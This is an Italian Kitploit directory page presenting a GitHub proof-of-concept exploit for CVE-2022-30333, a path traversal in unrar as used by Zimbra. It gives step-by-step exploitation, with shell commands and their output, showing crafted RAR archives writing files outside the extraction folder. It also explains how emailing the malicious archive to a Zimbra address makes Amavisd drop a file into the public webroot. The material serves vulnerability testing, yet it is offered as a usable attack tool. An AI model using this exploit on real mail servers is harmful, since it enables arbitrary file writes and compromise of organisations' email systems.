Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-30333-PoC — Proof-of-concept exploit per CVE-2022-30333, una vulnerabilità di path traversal in unrar utilizzato da Zimbra, che dimostra la scrittura arbitraria di file tramite archivi RAR appositamente creati. | Kitploit
Strumenti/GitHubGitHub/thel1ghtvn/cve-2022-30333-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubthel1ghtvn/cve-2022-30333-poc

CVE-2022-30333-PoC

Proof-of-concept exploit per CVE-2022-30333, una vulnerabilità di path traversal in unrar utilizzato da Zimbra, che dimostra la scrittura arbitraria di file tramite archivi RAR appositamente creati.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
1334 anni faNon ancora revisionato
Condividi

CVE-2022-30333-POC

File di esempio per testare CVE-2022-30333

  • Sample.rar : se vuoi testare su Linux. Quando lo estrai, crea trav in ../../tmp/traversed. Assicurati che la directory ../../tmp/traversed esista prima di estrarre Sample.rar

  • exp.rar : se vuoi testare sul server di posta Zimbra. Quando lo estrai, crea moo.txt in /opt/zimbra/jetty_base/webapps/zimbra/public/. Puoi accedere a questo file all'indirizzo https://zimbra_mail_domain/public/moo.txt

FASI DI SFRUTTAMENTO

Test su Linux

root@kitploit:~
mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

Test su Zimbra

  • Crea un'email e allega un file rar dannoso, quindi invialo a un indirizzo email Zimbra. Questo file rar verrà estratto durante l'analisi con Amavisd.
  • Il file moo.txt dovrebbe trovarsi in: /opt/zimbra/jetty_base/webapps/zimbra/public/moo.txt oppure https://zimbra_mail_domain/public/moo.txt

RIFERIMENTI

  1. Blog vietnamita di DEV2SEC
  2. Blog inglese di Sonarsource
  3. Un ringraziamento speciale a mrlihd per avermi aiutato a ricostruire la catena di attacco in Zimbra
Scarica lo strumento